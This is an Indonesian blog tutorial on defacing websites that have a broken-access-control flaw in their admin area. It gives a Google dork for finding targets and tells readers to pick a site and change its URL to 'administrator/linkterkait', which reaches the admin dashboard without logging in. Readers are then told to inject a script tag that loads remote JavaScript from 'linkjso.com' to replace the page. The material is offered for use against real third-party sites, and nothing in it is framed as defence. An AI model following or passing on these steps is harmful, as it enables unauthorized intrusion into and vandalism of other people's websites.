Laporkan Jika Terdapat Bug! Contact Us Report!
Home
deface
News

Cara Deface Poc Mistake Admin

Cara Deface Poc Mistake Admin

 


Cara Deface Poc Mistake Admin


Halo gengs disini gua akan share tutorial Cara Deface Poc Mistake Admin

Mistake Admin merupakan salah satu cara deface yang menemukan dashboard admin tanpa harus login terlebih dahulu, teknik deface ini menggunakan dork yang dimana halaman dapat diganti dengan script Jso untuk mendeface halaman website tersebut. 


Bahan yang harus disiapkan yaitu:
Chrome
  • Dork: inurl: page/detail juli 2022
  • Exploit: administrator/linkterkait
  • Jika sudah di Deface untuk edit dashboard menggunakan Exploit: administrator/edit_linkterkait/1

Oke langsung aja!

Langkah-langkah:

  1. pertama kalian search dulu dork nya di google chrome
2. Pilih salah satu target
3. Setelah itu ganti dork page/detail
4. Ganti jadi administrator/linkterkait

5. Jika vuln maka akan masuk kedalam dashboard admin seperti dibawah ini!

6. Kemudian klik action warna hijau
9. Setelah itu masukan script Jso <script type="text/javascript" src="http://linkjso.com"></script>

Bagi yang belum tau cara membuat script JSO 

 
Setelah itu klik update



10. Lalu refresh halaman website, maka akan terganti dengan script Jso kalian


Itulah tutorial Cara Deface Poc Mistake Admin jika ada yang kurang mengerti bisa chat dikolom komentar dibawah ini.
Terima Kasih!

Rate this article

Loading...
I am a student who has a hobby of writing articles and blogs I am a student who has a hobby of writing articles and blogs

Post a Comment

Cookies Consent

This website uses cookies to ensure you get the best experience on our website.

Cookies Policy

We employ the use of cookies. By accessing Lantro UI, you agreed to use cookies in agreement with the Lantro UI's Privacy Policy.

Most interactive websites use cookies to let us retrieve the user’s details for each visit. Cookies are used by our website to enable the functionality of certain areas to make it easier for people visiting our website. Some of our affiliate/advertising partners may also use cookies.